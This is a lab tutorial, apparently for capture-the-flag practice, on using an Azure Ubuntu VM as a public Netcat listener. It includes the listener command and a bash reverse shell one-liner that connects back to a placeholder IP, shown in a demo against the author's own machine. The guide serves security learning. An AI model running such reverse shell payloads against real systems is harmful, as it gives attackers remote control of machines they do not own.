DISCLAIMER

All information discussed in this article is presented educationally. Please use this information legally and ethically.

Background Information

A few months back, I was helping a friend of mine do a Capture the Flag (CTF) challenge. An issue they ran into was on the challenge they wanted to set up a Netcat listener to be used as a reverse shell to get initial access to the machine that was hosting this challenge. The reason why this was a problem is that when you are setting up a reverse shell, you need to provide an IP address as an argument, and since my friend was on their home network and using their personal computer, their device is using a private IP address which was sitting behind his internet gateway. They chose not to expose their device to the public internet due to the significant security risks involved.

THE SOLUTION

I had offered to help my friend solve this issue. I mentioned they could possibly use a cloud provider, spinning up a virtual machine using that provider, and exposing that virtual machine to the internet. The virtual machine would have a public IP address so it could be used as a Netcat listener that could be set up for reverse shells on capture the flag events. I was in the process of studying for the AZ-104 certificate, and I was learning about the concept of setting up an Azure Virtual Machine. When studying this concept, I decided to test if it was possible to use an Ubuntu Virtual Machine on Azure as a Netcat listener and use it for reverse shells. After testing my theory, I learned it was possible to use an Ubuntu Virtual Machine using Azure to solve this problem. This article is going to teach you how to set up an Ubuntu Virtual Machine and use Netcat. I learned it was possible to use an Ubuntu Virtual Machine using Azure to solve this problem. This article is going to teach you how to set up an Ubuntu Virtual Machine and use Netcat for reverse shells.

Prerequisites

• You will need an Azure Account
• VirtualBox or VMWare
• Ubuntu Desktop Virtual Machine running on VirtualBox or VMware
• Positive Attitude for learning Azure!

Before reading this article, please make sure to create an Azure Account and create an Ubuntu Desktop Virtual Machine on either VirtualBox or VMware to be able to follow along and complete the demo at the end of the article.

Step 1: Setting up the Azure Resource Group

After logging into your Azure Portal, at the top left of the screen, click on the hamburger menu to open up the navigation and view all the different resources you can create on Azure. Under the list of options, select the option that says Resource groups. You will be navigated to the resource groups screen on Azure.

On this screen, click the + Create button, which will be located near the top left part of your screen. After you click this button, you will be prompted to fill in the details of your resource group.

For the Resource group name option, name your resource group ResourceGroup1, and for the Region, select the (US) West US option. After you name your resource group and select the region at the bottom left of the screen, select the blue button that says Review + Create. After you press the button, it will try to validate your resource group. After it finishes validating, near the bottom left of the screen, press the blue button that says Create. This will create your resource group, and you are ready to move on to the next step.

Step 1:

Step 2:

Step 2: Setting up Ubuntu Virtual Machine on Azure

After you create your resource group, in the search bar at the top of the screen type virtual machines, after you start searching there should be a dropdown with a few options, select the option titled Virtual machines. After you select this option you will be navigated to the Virtual Machines screen.

To be able to create a new virtual machine, select the button that says + Create to start the process of creating a new virtual machine. The button should open up a drop-down with a couple of options. When you see the drop-down down select the option that says Azure virtual machine. Create a virtual machine hosted by Azure. You will then be navigated to be able to fill in the details to create a virtual machine.

You will be started in the Basics tab. For this tab, under Resource Group, select the resource group you created earlier, which was named ResourceGroup1. Where it says Virtual machine name, name the virtual machine vm1. For the Region, select the option (US) West US. For the Image, select the option Ubuntu Server 24.04 LTS - x64 Gen2. At the time this article was written, this was the newest option. If you see other versions, select that version. Just make sure to select an Ubuntu Server option. Then for the Size select the option Standard_B1s - 1 vcpu, 1 GiB memory. For the Authentication Type, make sure to select the Password option, then for the Username, put azureuser, and for the Password and Confirm password options, enter a password of your choice. Then, for the Public inbound ports, select the option Allow selected ports and make sure that you select the option SSH (22). After you enter these values, click the button that says Next: Disks and then the button that says Next: Networking, so you can move onto the networking configuration tab.

DISCLAIMER

Make sure that you DO NOT forget the username and passwords because you will use these credentials to log in to the virtual machine you are about to create. If you forget the username and password for the user you created, you will have to either create a new user or reset the password for the existing user.

Step 1:

Step 2:

Now that you are in the Networking tab, just make sure that you have a Public IP enabled so that you allow traffic over the internet to this virtual machine. After you have confirmed that your virtual machine has a public IP address, you can click the blue button that says Review + create. This will take you to a page to ensure your virtual machine settings will pass the validation. When your validation passes, select the blue button that says Create to create this virtual machine.

Step 1:

Step 2:

Once you click the create button, it will take a few minutes to deploy your virtual machine. After your deployment finishes deploying you should see a blue button that says Go to resource. Click that button to go to your resource.

After you are navigated to your resource on the left side of the screen, you should see a navigation bar. Locate the section titled Networking, and click on the option that says Network settings. Under the network settings, look for your Public IP address, write that down somewhere because we are going to use that IP address to connect to this computer using SSH, and we will eventually use this IP address to create a reverse shell. After writing down the IP address look for a blue button near the far right of the screen called + Create port rule, click on that button to open up a drop down menu, and select the option called Inbound port rule, so you can create a port rule to allow connections to our Netcat listener we are going to set up.

Step 1:

Step 2:

After you click the button on the far right of the screen, a module should slide onto the screen called Add inbound security rule. For Source leave it as Any, leave the Source port ranges as *, leave the Destination as Any, and leave the Service as Custom. You will need to change the Destination port ranges to 4444, make sure the action is set to Allow, and give it a Name of AllowAnyNCTraffic. After you fill in those details, press the blue button that says Add to be able to add this rule. Once you complete this, you are ready to move on to the next step.

Step 3: Logging into the Azure Virtual Machine

There are a couple of ways to access your Azure Virtual Machine, but in this tutorial, you will use the SSH protocol to log in to your virtual machine. Open a new terminal (terminal if you are on a MacBook or Linux, or PowerShell if you are on Windows). Then inside of your terminal type the command ssh azureuser@yourpublicip, where you need to replace where it says yourpublicip with your actual public IP address (an example of what your public IP will look like: 134.23.12.2). Once you enter the command, hit the Enter key on your keyboard. It will then ask you to continue connecting, type yes, and hit the Enter key again. Then it will prompt you for a password. Make sure you enter your password correctly. If you do not enter your password correctly, it will say Permission denied, please try again. If you enter your password correctly, it will give you a huge message, and then you will see some text saying azureuser@vm1. This indicates that you have logged in successfully. If you want to check if you are logged in, in the terminal type in the command whoami and hit enter. You should see a result saying azureuser.

Step 1:

Step 2:

You will need to make sure you have Netcat installed on your computer. When creating this tutorial, I noticed that Netcat already came pre-installed on the virtual machine. To see if you have Netcat installed, type the command nc -h in your terminal and then hit the enter key. You should see a message saying OpenBSD netcat (Debian).

If you get an error message when running the command above, you will Netcat on your machine. To install Netcat, write the command sudo apt install netcat. This command will install Netcat, and after you finish installing it, you can proceed to the next step.

Step 4: Setting up the Netcat listener

Now that you have Netcat installed, you will need to set up Netcat as a listener so it can act as a reverse shell. To be able to do so, type in nc -lvnp 4444. What this command does is that Netcat will enter listening mode on port 4444, and it will be in verbose mode. Once you receive a message in your terminal saying Listening on 0.0.0.0 4444, that means Netcat is listening for traffic on port 4444, and you are ready to proceed to the last step, which is to craft the reverse shell payload for your Ubuntu Desktop Virtual Machine.

DISCLAIMER

It is important to know that if you leave port 4444 open, it can be risky if the Netcat listener is left running unattended, and when you finish this walkthrough, either remove the inbound rule that was set up earlier in this walkthrough or adjust the inbound rule to whitelist trusted IP addresses to reduce the chance of an attacker compromising the Azure Virtual Machine.

Step 5: Configuring the Reverse Shell

To be able to craft a reverse shell payload, I recommend using Reverse Shell Generator Site because of how easy it is to use, and it covers a variety of use cases. This website is really useful to be able to craft reverse shell payloads for all different types of command lines and programming languages. When you come to the Reverse Shell Generator Website, make sure you have the Bash -i shell option selected. You will also need to put in the public IP address of the Azure Virtual Machine you created, where it says IP, and for port, make sure you enter 4444 since that’s the port number that Netcat is listening for on our Azure Virtual Machine. After you craft your payload, it should look similar to the following command: sh -i >& /dev/tcp/yourpublicip/4444 0>&1, make sure to replace yourpublicip with the public IP address of the Azure Virtual Machine. Another thing to note is that this payload will only work on Bash environments. If you want to create a reverse shell payload for PowerShell, PHP, Python, etc., you will have to navigate this site and configure the settings for the specific environments.

Now that you have your payload ready, enjoy playing around with these resources, have fun, and also make sure to use this knowledge in a legal and ethical way.

Demoing Reverse Shell

In the following demo, I will be showcasing how to send a reverse shell from a target Ubuntu Desktop using the Bash terminal to the Azure Virtual Machine that was set up during the tutorial. I first make sure that I have the Netcat listener running on port 4444 on my Azure Virtual Machine by running the command nc -lvnp 4444 and then pressing the Enter key on my keyboard.

Next I go to my Ubuntu Desktop Virtual Machine that is running in VMware and enter the reverse shell payload I crafted earlier which is: sh -i >& /dev/tcp/yourpublicip/4444 0>&1, please make sure to replace yourpublicip with the public IP address associated with your Azure Virtual Machine. After I hit the Enter key, my Azure Virtual Machine will now have access to my Ubuntu Desktop via a Reverse Shell.

If I type whoami and hit enter, it won’t say I am azureuser, it will say I am gibbs, which is the user I created on my Ubuntu Desktop. If I wanted to, I could enter other commands such as ls, pwd, touch, rm, cat, echo, grep, or find to be able to manipulate the contents on my Ubuntu Desktop and cause some real damage.

DISCLAIMER

The actions taken in this demo should only occur in a lab or testing environment, such as TryHackMe, HackTheBox, or a private lab you have control over. If you plan on using this information during a live penetration test, make sure you have permission to do so.

This is the end of the article. I hope you enjoyed reading this tutorial and can use this knowledge in a responsible way. This knowledge can also apply to other cloud providers such as Amazon Web Services (AWS) or Google Cloud Platform (GCP). You could set up a virtual machine with those other cloud providers and make sure it has a public IP address to be able to accomplish the same thing that was accomplished in this tutorial. Happy Hacking!

LINKS

• Microsoft Certified: Azure Administrator Associate
• Create an Azure Account
• Reverse Shell Generator Website